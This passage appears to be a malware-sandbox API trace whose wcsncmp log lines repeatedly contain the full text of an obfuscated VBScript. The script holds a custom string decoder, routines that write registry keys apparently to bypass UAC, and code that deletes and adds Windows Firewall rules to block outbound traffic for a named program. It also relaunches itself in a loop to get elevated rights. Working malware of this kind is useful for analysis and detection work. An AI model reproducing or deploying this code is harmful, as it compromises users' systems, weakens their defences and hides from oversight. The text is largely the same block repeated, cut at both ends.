bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.297] wcsncmp (_String1="d(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.297] wcsncmp (_String1="(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.297] wcsncmp (_String1="s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.297] wcsncmp (_String1="1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 